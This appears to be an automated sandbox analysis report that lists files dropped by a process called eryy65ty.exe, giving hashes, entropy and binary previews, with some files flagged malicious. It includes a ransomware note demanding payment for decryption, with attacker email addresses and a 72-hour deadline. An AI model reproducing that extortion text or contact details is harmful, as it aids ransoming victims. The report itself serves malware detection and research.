                                                                                                    SHA-512:C0D80AE07001586A90F1A5E718D3C65DC1ACE87E91B05211BA8C8A79C00AAF75BCB98334AA38275DA382C4320CBFFE7FBD47D0CA3F4A5A6BAEB305F92A30A994
                                                                                                    Malicious:false
                                                                                                    Preview:..t...-.$...n........R.....[...S.V.......c...M..&D..o......s1..b.......Eh......uS.5...k.[.q,...f..0.5A;....F....B.H....@..@..,-./}aD..=r;.y.w..t.../c..o.D..........&."..d.:.r.r...Pr,....J.oHE../.r.~.......v.#u..2aC..W.c...%=.....N...S.O.2..r....V......R*.. ..1u_............)s...V.2..*E.*....1.5......2...w.Z.y..7tq....e.e..e.qSQa..2qd.A..........~/g*...G7./...P...=)...Ai...u5...~......#....F.A.7.8....b......z...Yt..N..d@a...|.o..|V.dW.NF..|..q9....L]U.pJg..f....Djo.jLM.}yn..1.j..R1..b.!..R..<L..\.t..g............g.......ft'.r....W..l..91n5.<=.y.....*..Z|BYa......,...<Iu..m.:.>.Q...W..B.....t...Zo.$0..F....y......F.p.,\.....x....s..J.%.;...p..s../2+.S..G.....^..ls6wL....R....f.o..b...6.,w$..Sz{.v.o.k..9..........]..(7........2..J...p..m..V..ul...`.vT./..O..a..}.N.#+x..u..b6-.K..X..).^.7^..?f...ku9......!.$>....S.k.....o[.0.6.V...F.~...F).\...6...."....e....x..v....{.".r?.R...~..8....B./P...N.W...CtT. R....me`.UV...i;;<.E.....]r..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.85214207801734
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:jdVxVa/B02LnM9IVFxa/nGJdWjOdsjfKG+kYwfPOz6FoJqMlDR:jdFaZPLM9IVHbgOsKXwn+6F85DR
                                                                                                    MD5:411DE98D599694384EF6AFD441E5AD02
                                                                                                    SHA1:8A2351F9BE2734E0D9F40392A324BDC40FA5BC69
                                                                                                    SHA-256:DF9F98CA9AAA66E5766FD23441FD90A91B0499316920286FE4C66989970C4BF6
                                                                                                    SHA-512:C0D80AE07001586A90F1A5E718D3C65DC1ACE87E91B05211BA8C8A79C00AAF75BCB98334AA38275DA382C4320CBFFE7FBD47D0CA3F4A5A6BAEB305F92A30A994
                                                                                                    Malicious:false
                                                                                                    Preview:..t...-.$...n........R.....[...S.V.......c...M..&D..o......s1..b.......Eh......uS.5...k.[.q,...f..0.5A;....F....B.H....@..@..,-./}aD..=r;.y.w..t.../c..o.D..........&."..d.:.r.r...Pr,....J.oHE../.r.~.......v.#u..2aC..W.c...%=.....N...S.O.2..r....V......R*.. ..1u_............)s...V.2..*E.*....1.5......2...w.Z.y..7tq....e.e..e.qSQa..2qd.A..........~/g*...G7./...P...=)...Ai...u5...~......#....F.A.7.8....b......z...Yt..N..d@a...|.o..|V.dW.NF..|..q9....L]U.pJg..f....Djo.jLM.}yn..1.j..R1..b.!..R..<L..\.t..g............g.......ft'.r....W..l..91n5.<=.y.....*..Z|BYa......,...<Iu..m.:.>.Q...W..B.....t...Zo.$0..F....y......F.p.,\.....x....s..J.%.;...p..s../2+.S..G.....^..ls6wL....R....f.o..b...6.,w$..Sz{.v.o.k..9..........]..(7........2..J...p..m..V..ul...`.vT./..O..a..}.N.#+x..u..b6-.K..X..).^.7^..?f...ku9......!.$>....S.k.....o[.0.6.V...F.~...F).\...6...."....e....x..v....{.".r?.R...~..8....B./P...N.W...CtT. R....me`.UV...i;;<.E.....]r..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:COM executable for DOS
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.836063189480172
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2spzQydEDFsNIHQHzhSexG4KqJgtB4hhmVLtv0/Ryl86x:2sJQydPrHzGF8hW08l86x
                                                                                                    MD5:17713C3B50B263CBEFFFA41D64458AE8
                                                                                                    SHA1:5C827A3C03C87601E8CCEEF896CB50BF72A41D58
                                                                                                    SHA-256:F9886EECA5D06DB5661A00E33DF57BFEBF079918E7D8748CF44F987EDDA68236
                                                                                                    SHA-512:F264089D76B95AF26A13F0482175B4B4EF906C2BF86C50CFC73196319D3E78EAF05291EFFE91A22CF35C9250BDCC16AA807E4C6A62F5A8EDE564C424D4FD3587
                                                                                                    Malicious:true
                                                                                                    Preview:..-O.6.......!..HA.0...DWl..k@.....[.Y...+..=$.,I.[\.....C.9..h....ZN.*.....~...xW..z......W......b..C.$.~.C.G.Du..].|..z}..\......sEe..s.....b......$}|].X.4@!.F..^a.....w^x:P.....Y/...O....1-X..!....~.?S.`....0Rf.P.K..*.%S~..E1..........h......W........y.L..yC.gj..E... .vb!...M..Zr.8..O.~eZ..T..!}r|...u.b..).....#..~R.R.P...V.....u.Lx[.6..&9.P...S^.[.@9E..8.v.ci.KO.....lHo0......e.'.c...n...r-.+....,....5..P...fe..e..c+...W..[^..W..?TV6..s..m.A0X!gS.....D....YTN......u+...+........9.7w......^..j.i.z.;..C.t|%../..Pi....".zJ.6=.Xm.$..\v._[.^.....7.Rgq.2U.<i.:.?q.R..W......@..`!...C0..1G1g....%.M.Z.#...{..R.M'{.5...z..< ....Hwc....NO...H...?4e3...7.YTT..UY...0...5:J%[.O.....=.....4xb...A........i.-L..'.D.....<...^..d.;U0..Q...g.&.ZvPz..6[b.n....{.>6.h.D......V...p..)..A*..DO..G%.W..m.l.E.Q..!..p7k@<....n.x....WI.r2../........O(..m.,j..........f..8.[T..0.X..&.=...t...J.l.5....PZ.|......C.y.......!uu..J.g.<q/..T.6J..+-.h$.d.zVs.m..-]...o.`P..h..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:COM executable for DOS
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.836063189480172
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2spzQydEDFsNIHQHzhSexG4KqJgtB4hhmVLtv0/Ryl86x:2sJQydPrHzGF8hW08l86x
                                                                                                    MD5:17713C3B50B263CBEFFFA41D64458AE8
                                                                                                    SHA1:5C827A3C03C87601E8CCEEF896CB50BF72A41D58
                                                                                                    SHA-256:F9886EECA5D06DB5661A00E33DF57BFEBF079918E7D8748CF44F987EDDA68236
                                                                                                    SHA-512:F264089D76B95AF26A13F0482175B4B4EF906C2BF86C50CFC73196319D3E78EAF05291EFFE91A22CF35C9250BDCC16AA807E4C6A62F5A8EDE564C424D4FD3587
                                                                                                    Malicious:true
                                                                                                    Preview:..-O.6.......!..HA.0...DWl..k@.....[.Y...+..=$.,I.[\.....C.9..h....ZN.*.....~...xW..z......W......b..C.$.~.C.G.Du..].|..z}..\......sEe..s.....b......$}|].X.4@!.F..^a.....w^x:P.....Y/...O....1-X..!....~.?S.`....0Rf.P.K..*.%S~..E1..........h......W........y.L..yC.gj..E... .vb!...M..Zr.8..O.~eZ..T..!}r|...u.b..).....#..~R.R.P...V.....u.Lx[.6..&9.P...S^.[.@9E..8.v.ci.KO.....lHo0......e.'.c...n...r-.+....,....5..P...fe..e..c+...W..[^..W..?TV6..s..m.A0X!gS.....D....YTN......u+...+........9.7w......^..j.i.z.;..C.t|%../..Pi....".zJ.6=.Xm.$..\v._[.^.....7.Rgq.2U.<i.:.?q.R..W......@..`!...C0..1G1g....%.M.Z.#...{..R.M'{.5...z..< ....Hwc....NO...H...?4e3...7.YTT..UY...0...5:J%[.O.....=.....4xb...A........i.-L..'.D.....<...^..d.;U0..Q...g.&.ZvPz..6[b.n....{.>6.h.D......V...p..)..A*..DO..G%.W..m.l.E.Q..!..p7k@<....n.x....WI.r2../........O(..m.,j..........f..8.[T..0.X..&.=...t...J.l.5....PZ.|......C.y.......!uu..J.g.<q/..T.6J..+-.h$.d.zVs.m..-]...o.`P..h..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.836629418471577
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Y7NLBfAQ+rVoci53aYQovJphyEd1dVPTOYGwyVGFmg4fe23xhEdK+L24MBqdnDue:YJL9+mciyo9dVPTdDFG2+p+C4MEDuaQm
                                                                                                    MD5:392CB0A26C2B34236CEA4348D6F76A82
                                                                                                    SHA1:794A989874CD36E1EF4E8AAD517B77354E89CAD0
                                                                                                    SHA-256:636789F4F71143D72C781DC3EE5BB0764270BBD327ABA6B07F3134A6EEA1563C
                                                                                                    SHA-512:42EE586B56C1161D870982A5D9E4C60AF377B06F07F085BA555CCD00096450140A81B87E77FE44F822D2CC47543D77223D3581C6209916D4EF4441892AEFA3C1
                                                                                                    Malicious:false
                                                                                                    Preview:..................%..T.i.c<}a..(b.k.Qu..T...?4...$|..Z.......Y...-v..CZ.t..(Q.)......N~....oi..&@....\#...1.T...>4.L.w.............Y.G.Ut..H.X... .........x...&......!J:6.Z.{.Z..'S..............%/g.L.g.:.E...'g......J.~W.F.2$...u....|.t..M.........d...6 <......".I..`s..8.UB..a.......*....>|(...zM.\.....K...H}.....z.Uf$.._.o.....S.Q,.z.....d.._.....].../.N...bm.mV4...V...'{o....;.....7.,S..L..y...j..\..,6..X.=..].M^..)..3..xK;....{..13)....z... e....hS.Xg........]^..F?.s..x!w.Xy&.....7.....M....9..l...H.@...H..).....}...^.uS..7.k..K|~.\...+_7.y...]......f.....U&7..Z...2..'.....d....,IZUExl%.Z...I.....W.f.G........{I.i...~V]..nUn..i.CB.V0.I#C5.TQ2.J.._0..t.Y<..a.B....<..7..2....!..#.f]..j...,*.wPB.$.d..n.}N.o..=.'^.5.%'.0.V..".W./.....a....^..^`..2.A..ya.... .....I..i.W.rQ8....A).i..J..p"A......Bpi.n..Dc.....(S!..F,l..E..F.../..[.9#X7e.a..p....@..6[...S$"....t.X....-.A.i.k\`..j]...g)..+.<....z\....&G^...2.q-..|......{......K.....A.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.836629418471577
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Y7NLBfAQ+rVoci53aYQovJphyEd1dVPTOYGwyVGFmg4fe23xhEdK+L24MBqdnDue:YJL9+mciyo9dVPTdDFG2+p+C4MEDuaQm
                                                                                                    MD5:392CB0A26C2B34236CEA4348D6F76A82
                                                                                                    SHA1:794A989874CD36E1EF4E8AAD517B77354E89CAD0
                                                                                                    SHA-256:636789F4F71143D72C781DC3EE5BB0764270BBD327ABA6B07F3134A6EEA1563C
                                                                                                    SHA-512:42EE586B56C1161D870982A5D9E4C60AF377B06F07F085BA555CCD00096450140A81B87E77FE44F822D2CC47543D77223D3581C6209916D4EF4441892AEFA3C1
                                                                                                    Malicious:false
                                                                                                    Preview:..................%..T.i.c<}a..(b.k.Qu..T...?4...$|..Z.......Y...-v..CZ.t..(Q.)......N~....oi..&@....\#...1.T...>4.L.w.............Y.G.Ut..H.X... .........x...&......!J:6.Z.{.Z..'S..............%/g.L.g.:.E...'g......J.~W.F.2$...u....|.t..M.........d...6 <......".I..`s..8.UB..a.......*....>|(...zM.\.....K...H}.....z.Uf$.._.o.....S.Q,.z.....d.._.....].../.N...bm.mV4...V...'{o....;.....7.,S..L..y...j..\..,6..X.=..].M^..)..3..xK;....{..13)....z... e....hS.Xg........]^..F?.s..x!w.Xy&.....7.....M....9..l...H.@...H..).....}...^.uS..7.k..K|~.\...+_7.y...]......f.....U&7..Z...2..'.....d....,IZUExl%.Z...I.....W.f.G........{I.i...~V]..nUn..i.CB.V0.I#C5.TQ2.J.._0..t.Y<..a.B....<..7..2....!..#.f]..j...,*.wPB.$.d..n.}N.o..=.'^.5.%'.0.V..".W./.....a....^..^`..2.A..ya.... .....I..i.W.rQ8....A).i..J..p"A......Bpi.n..Dc.....(S!..F,l..E..F.../..[.9#X7e.a..p....@..6[...S$"....t.X....-.A.i.k\`..j]...g)..+.<....z\....&G^...2.q-..|......{......K.....A.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.858815253201542
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:J4xYkAPqTTjXUVXen/e7PYnOoATr48GkorxxBImeq3oIvrwrhM4uHH:J28SUU/4wdyXGF3mc01In
                                                                                                    MD5:BA9FA1C08035E65F4B257E5DA0B2851F
                                                                                                    SHA1:15E4C2AF90B764B13FE72D77F9E8655A9906B591
                                                                                                    SHA-256:B16FCAB63FE5CB96C0251F4B0D3F643F2E7B455810C650C44F8893501E06670F
                                                                                                    SHA-512:DACBE9CEF4E93F5BF79BCE83DC99E37B8C16DE96E74109F491CEECF5B92980ABB9C29BFB75D549394622B3FF3525DC00A0571FB7422D8467A4C6B93F796E4AAC
                                                                                                    Malicious:false
                                                                                                    Preview:Z....A"...(....&...Da..._i@..L.vn..Wk...K...=a;.'..FM..Q.....L....t....~v...Whj.|...S.....PJ..0"b...........t...v.xw..)d.Y.E. ,.s.e.Z.0p.{...f@o]..5...O.u.H..v...du.......*..E.O.qr.a... ....{..o..........AO.n...Q.s../*.&/...3.t....>SNJ........+...6j /..X9S..t..MS`..]dhI.e...F.j.{.g........CH..U\..x....(...V/.*...7...1.:.y........I....g|Kmm...+....q^g.=........m......5.......r..J.{..o.Fg...m.a.a"n..:.G...V. ..Q.....&.h.+....Y..[Z.....m......B.M...w.A&o.p...~V.q=..L. .LE\...J.l.W.!...........n.-.......E......G.;.z...q.nv&n....it...,........./.].t.9...u........'..T}.^i`x......P....h..Qt.\...,.?..W...x.SK..Tf.Y....[#..=+.$+:.m..]..*.....7.....<...D.dy..r.#lP.....<.j.O.zg..._veh.e.&.x.|5..8.Hw.3....m...R[..'..,}.......>XZd...o....1d....xH..N.....g+Q.G.B....Iy.,Cd.^OC].<<.v.a.B..r..Q..S.:...,.,....../...I$.(....KRH'A.q..L*.o.t.....9...... ...o...>.M.#..t.u.ne...`[4!...v...O.U...G$..J......./..R.ys..+.d...w.v.@N.<y.-.(..2..*.P....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.858815253201542
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:J4xYkAPqTTjXUVXen/e7PYnOoATr48GkorxxBImeq3oIvrwrhM4uHH:J28SUU/4wdyXGF3mc01In
                                                                                                    MD5:BA9FA1C08035E65F4B257E5DA0B2851F
                                                                                                    SHA1:15E4C2AF90B764B13FE72D77F9E8655A9906B591
                                                                                                    SHA-256:B16FCAB63FE5CB96C0251F4B0D3F643F2E7B455810C650C44F8893501E06670F
                                                                                                    SHA-512:DACBE9CEF4E93F5BF79BCE83DC99E37B8C16DE96E74109F491CEECF5B92980ABB9C29BFB75D549394622B3FF3525DC00A0571FB7422D8467A4C6B93F796E4AAC
                                                                                                    Malicious:false
                                                                                                    Preview:Z....A"...(....&...Da..._i@..L.vn..Wk...K...=a;.'..FM..Q.....L....t....~v...Whj.|...S.....PJ..0"b...........t...v.xw..)d.Y.E. ,.s.e.Z.0p.{...f@o]..5...O.u.H..v...du.......*..E.O.qr.a... ....{..o..........AO.n...Q.s../*.&/...3.t....>SNJ........+...6j /..X9S..t..MS`..]dhI.e...F.j.{.g........CH..U\..x....(...V/.*...7...1.:.y........I....g|Kmm...+....q^g.=........m......5.......r..J.{..o.Fg...m.a.a"n..:.G...V. ..Q.....&.h.+....Y..[Z.....m......B.M...w.A&o.p...~V.q=..L. .LE\...J.l.W.!...........n.-.......E......G.;.z...q.nv&n....it...,........./.].t.9...u........'..T}.^i`x......P....h..Qt.\...,.?..W...x.SK..Tf.Y....[#..=+.$+:.m..]..*.....7.....<...D.dy..r.#lP.....<.j.O.zg..._veh.e.&.x.|5..8.Hw.3....m...R[..'..,}.......>XZd...o....1d....xH..N.....g+Q.G.B....Iy.,Cd.^OC].<<.v.a.B..r..Q..S.:...,.,....../...I$.(....KRH'A.q..L*.o.t.....9...... ...o...>.M.#..t.u.ne...`[4!...v...O.U...G$..J......./..R.ys..+.d...w.v.@N.<y.-.(..2..*.P....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.839017023593448
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:p7NFZXZw415F60SENaO5fWmoNYdNCYQ+Tk4y9NA6e/1smry6AvJ2CMCd:p7NOx0SSacfWmoN6Nq+Tky6e9xz+JJ
                                                                                                    MD5:C14751BDCA4C7C861BCC7F29D4FFF6D2
                                                                                                    SHA1:E2D896B2E32D54248F32D091DBD114F553D82118
                                                                                                    SHA-256:2084EAA75A280A417C89BDB47BD6D27BEC8E5345FE4A225BCE0A866548502F8F
                                                                                                    SHA-512:4F0188A18E44F3CE9CF341EA83496791330C5E6052AD71F2E7C8236DC5608E31474614E09AE14D1E5A3E945FBFB05558D3EA4C54DD262F895E74185E760FCA6B
                                                                                                    Malicious:false
                                                                                                    Preview:...b....7.DX.h..I..G.kp..... ..b.[.%..._S'.......0.1.Ze.j.*.q.....a5^...[|N..\....sN.7..`..3..G....@...A.....z{../;..X...N.../.(s...Z;C......B.V...g.....`.+Ee!i.....wq.._...Y..}...u..3.r....36w...z...K^.6..ej.x._.... ....m.;$).,v..s..9a........xSA..F9.;<../../..4.0.....Qf..)...m..w.....I....\....0..N`>.d.i.G./.6..~...x>T..5#.S.c.~.K...{....l......N..:......h...%~D........B../?...@Y.E..:P........a...4;.......n...*.'..z.....>.Q....h[...Bo....,=.....mqN....=...w.>]r.....H...........Z....8e......j:....v....u......z.6....%.wG...h...|..|.8?..iH...gm.U...Y..b+7l..S.{F...|}..T....(!vF.........1L..l..p1....p..<]..Z...S..y....!i.RI..kC...)%1=...).7..H..(..>....0...2.8?h......I.[.....i....k.%U..P.L...\.z.._..@.dl6w.j... .}H.R..!m. .y..fxq.$;[..8D...]6.....G..[.$C.y...`..}...3..F...f.2..,$../..b....R..H....Oi..?'.\...y..V..&...lQ.k....i..P...b...uw4_}Cr\...+.bA1......Gc...V+......./e..W..$......LIR.cq.SQ.e....KL...D..nU..]Ei.......[..y.E-u..K.. .-r
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.839017023593448
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:p7NFZXZw415F60SENaO5fWmoNYdNCYQ+Tk4y9NA6e/1smry6AvJ2CMCd:p7NOx0SSacfWmoN6Nq+Tky6e9xz+JJ
                                                                                                    MD5:C14751BDCA4C7C861BCC7F29D4FFF6D2
                                                                                                    SHA1:E2D896B2E32D54248F32D091DBD114F553D82118
                                                                                                    SHA-256:2084EAA75A280A417C89BDB47BD6D27BEC8E5345FE4A225BCE0A866548502F8F
                                                                                                    SHA-512:4F0188A18E44F3CE9CF341EA83496791330C5E6052AD71F2E7C8236DC5608E31474614E09AE14D1E5A3E945FBFB05558D3EA4C54DD262F895E74185E760FCA6B
                                                                                                    Malicious:false
                                                                                                    Preview:...b....7.DX.h..I..G.kp..... ..b.[.%..._S'.......0.1.Ze.j.*.q.....a5^...[|N..\....sN.7..`..3..G....@...A.....z{../;..X...N.../.(s...Z;C......B.V...g.....`.+Ee!i.....wq.._...Y..}...u..3.r....36w...z...K^.6..ej.x._.... ....m.;$).,v..s..9a........xSA..F9.;<../../..4.0.....Qf..)...m..w.....I....\....0..N`>.d.i.G./.6..~...x>T..5#.S.c.~.K...{....l......N..:......h...%~D........B../?...@Y.E..:P........a...4;.......n...*.'..z.....>.Q....h[...Bo....,=.....mqN....=...w.>]r.....H...........Z....8e......j:....v....u......z.6....%.wG...h...|..|.8?..iH...gm.U...Y..b+7l..S.{F...|}..T....(!vF.........1L..l..p1....p..<]..Z...S..y....!i.RI..kC...)%1=...).7..H..(..>....0...2.8?h......I.[.....i....k.%U..P.L...\.z.._..@.dl6w.j... .}H.R..!m. .y..fxq.$;[..8D...]6.....G..[.$C.y...`..}...3..F...f.2..,$../..b....R..H....Oi..?'.\...y..V..&...lQ.k....i..P...b...uw4_}Cr\...+.bA1......Gc...V+......./e..W..$......LIR.cq.SQ.e....KL...D..nU..]Ei.......[..y.E-u..K.. .-r
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:DOS executable (COM, 0x8C-variant)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.849526629317178
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ZyzMUUqzn9ILdYqpGJkWclgVLvFibOQ6KqiFoG/AlwOm1q9DK87rSX:3UUi4fwOW1VxibOQRHomR1mK8rSX
                                                                                                    MD5:80268A7255C917CED688C902262275AA
                                                                                                    SHA1:FA810739FA1828B4F5CA90F29E16BAE8100BF0F3
                                                                                                    SHA-256:59DEF4D8DF3929AB158AD00A9237AA2CBC06CF3AE8B9BC587D3A821DA8D8F8EE
                                                                                                    SHA-512:53235B57B4860236B621DF74FF287FA757E16BDD871E549B2372E50B9767BB9A85AD030EC3A1F0DB351BCB531ACAA8E6AFE42DD9CB4997A0DC5E05E421236204
                                                                                                    Malicious:true
                                                                                                    Preview:...R...j.......=....;.F.....Y.sw..R...0....&._.....V..N....s..73.b.....,..L.".d.f...i.....N..4j.W..b.O..Z......B..Y8..)O.[^..1.n..~$..y..CW.!.....[..y...p.kf...E.~..<..4n....|a.Xi........rm.7J....oM...!d.O.....x[.Y..a".~.T.Q.....2".i....@.....s|._.1.`.^../'GC....p.e......H.a...Bg.&.c:.j.8.Y.].R..K..5'...z..P.X.........".3../2..G....x..+.s)....}......K.j.|p4.n..~*.o6...Qb...x.R.9..~.G...|x<~..rE..4.~....+.l.....N...p...1..DZ@.Y..........$iq.E..$.&.....`......[...s{........u$......8M.....2.z..C...F`.N...Z.L....6{...@..+.u.......)..@_...=.....,e6..+..5@.SO..K..g..". >_;..=.cWIc"Y..G..#~...w.J..@$.]=o.l.V...E.9.(...1*..D........n.......J..d}.9..6JGCp.....p`....<<.!P.......m..c..(..9?.b.xB`{p.'...F......>...2......,.@0.../&%...s...>..........\O.].1."]NukR.].n.8......`.Y.3.t5.:.!t.e.....W.~;B........8..'.2.H,P.ag.q<D.....`...rJj.Q..@S.`..-..p.o...$C...5......`s...!...;H...>.l.C:NJ._..W.y,^n.a..E..x.)..(..b0.nq......(.G.v..................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:DOS executable (COM, 0x8C-variant)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.849526629317178
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ZyzMUUqzn9ILdYqpGJkWclgVLvFibOQ6KqiFoG/AlwOm1q9DK87rSX:3UUi4fwOW1VxibOQRHomR1mK8rSX
                                                                                                    MD5:80268A7255C917CED688C902262275AA
                                                                                                    SHA1:FA810739FA1828B4F5CA90F29E16BAE8100BF0F3
                                                                                                    SHA-256:59DEF4D8DF3929AB158AD00A9237AA2CBC06CF3AE8B9BC587D3A821DA8D8F8EE
                                                                                                    SHA-512:53235B57B4860236B621DF74FF287FA757E16BDD871E549B2372E50B9767BB9A85AD030EC3A1F0DB351BCB531ACAA8E6AFE42DD9CB4997A0DC5E05E421236204
                                                                                                    Malicious:true
                                                                                                    Preview:...R...j.......=....;.F.....Y.sw..R...0....&._.....V..N....s..73.b.....,..L.".d.f...i.....N..4j.W..b.O..Z......B..Y8..)O.[^..1.n..~$..y..CW.!.....[..y...p.kf...E.~..<..4n....|a.Xi........rm.7J....oM...!d.O.....x[.Y..a".~.T.Q.....2".i....@.....s|._.1.`.^../'GC....p.e......H.a...Bg.&.c:.j.8.Y.].R..K..5'...z..P.X.........".3../2..G....x..+.s)....}......K.j.|p4.n..~*.o6...Qb...x.R.9..~.G...|x<~..rE..4.~....+.l.....N...p...1..DZ@.Y..........$iq.E..$.&.....`......[...s{........u$......8M.....2.z..C...F`.N...Z.L....6{...@..+.u.......)..@_...=.....,e6..+..5@.SO..K..g..". >_;..=.cWIc"Y..G..#~...w.J..@$.]=o.l.V...E.9.(...1*..D........n.......J..d}.9..6JGCp.....p`....<<.!P.......m..c..(..9?.b.xB`{p.'...F......>...2......,.@0.../&%...s...>..........\O.].1."]NukR.].n.8......`.Y.3.t5.:.!t.e.....W.~;B........8..'.2.H,P.ag.q<D.....`...rJj.Q..@S.`..-..p.o...$C...5......`s...!...;H...>.l.C:NJ._..W.y,^n.a..E..x.)..(..b0.nq......(.G.v..................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.844920276590882
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:xjh/5y8iYuqj0mAhop4Of8h/pxxf87eK99mf7fvrlCJseNqDUntx5uoBdi:xPbyq5p4OGpxOT9kjxCJseMgnFuoBdi
                                                                                                    MD5:BD66182FAEBF8A8B5958729EBFFAB22E
                                                                                                    SHA1:ABE9B467D7DF4A4D2A4524A9C3B2F1F9DE5D629A
                                                                                                    SHA-256:61E4FBBE37849880A459BF9D53924F9D0806AF724CF81422BF0DC7078FBA3DD7
                                                                                                    SHA-512:6CBC5B6CA98036DCAF893B3CCD24975762240B0D08F84FF200148670946EAA5E75B1EABE8930726022501FFA947CB081C76BB444BA211B29DD1A66B8A300D5E5
                                                                                                    Malicious:false
                                                                                                    Preview:...Y>....g:.S..6........B....e%..}'...Q.P...;L.P...R....U..._..0...v8.&E..}..(,.........>....^.;.p...D.B.t.....C.[4Y..Y.J.G....U.a.....w3..a...!..c.b.N......:Ty2gz..kQ..xf..Zq.rbe.....@.4.7>...H...<.....7.......R..B...r./.P.....).B.....4.@...L...>,. .x...>.ml(.)JX..F-....B..=XAx.W.c.3...W.....z.s...x.kBD..F..sD.l....}M?.g.Up......e..x..6G.m!....2.....}....3.hNF|*U.}#....)....9a`8Q=..o.....~.+.yT.{...T....Vg+....&.6..O....-;...m]z>..C...X.P..x...Q...[.k.o.*..Q...+..1....r..s..%.jw..P*...&a.......?...=.. l.=......F/...E.....+L?...T.H..i..7.[.%.(.7.}L.|...T0..P...ti.:4.Fi.-.R...T..`...&."....l.}......Nu..vv....|..F.Nh..\.8.!Z.Z."||.oX.HJ...}...K.8i?M`.c.qc.oM.4.W}..3t.{.....B....%....zH.x..!>..Nw.fW9a..dV.h.9....*.../.^....#\.^.uI....]L...T$...4j.l^..ou...D8...TP......6.#Ko.8,.K+..C1.C.U4%..+E..i.v.;y.y.INTF.?H...z..t.y.#..,".>.$.B.../.v..GL.NK.....3...1.....e|$0.b.({E....Z.....\LPD.O.Sc.......W..l.%.-..%-K.;&....z....s..F.......~I.M...B{"..\T
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.844920276590882
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:xjh/5y8iYuqj0mAhop4Of8h/pxxf87eK99mf7fvrlCJseNqDUntx5uoBdi:xPbyq5p4OGpxOT9kjxCJseMgnFuoBdi
                                                                                                    MD5:BD66182FAEBF8A8B5958729EBFFAB22E
